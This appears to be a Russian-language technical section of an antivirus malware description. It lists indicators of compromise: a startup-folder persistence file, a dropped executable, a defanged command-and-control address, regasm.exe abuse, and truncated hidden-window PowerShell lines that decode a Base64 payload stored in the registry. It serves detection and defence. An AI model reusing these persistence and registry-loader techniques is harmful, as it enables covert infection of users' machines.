Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\fcfl.url
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %APPDATA%\fcflxpdaywtk.exe
- '14#.#1.236.24':4388
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $cMDcfuRQ='<Полный путь к файлу>';$uWnCSiPz=[Convert]::FromBase64String((Get-ItemProperty HKCU:\/Software\/LpdCR).cMDcfuRQ);for ($i=0;$i -lt $uWnCSiPz.Length;$i++){$uWnCSiPz[$i]=[byte]($uWnCSiP...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $cMDcfuRQ='<Полный путь к файлу>';$uWnCSiPz=[Convert]::FromBase64String((Get-ItemProperty HKCU:\/Software\/LpdCR).cMDcfuRQ);for ($i=0;$i -lt $uWnCSiPz.Length;$i++){$uWnCSiPz[$i]=[byte]($uWnCSiP...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'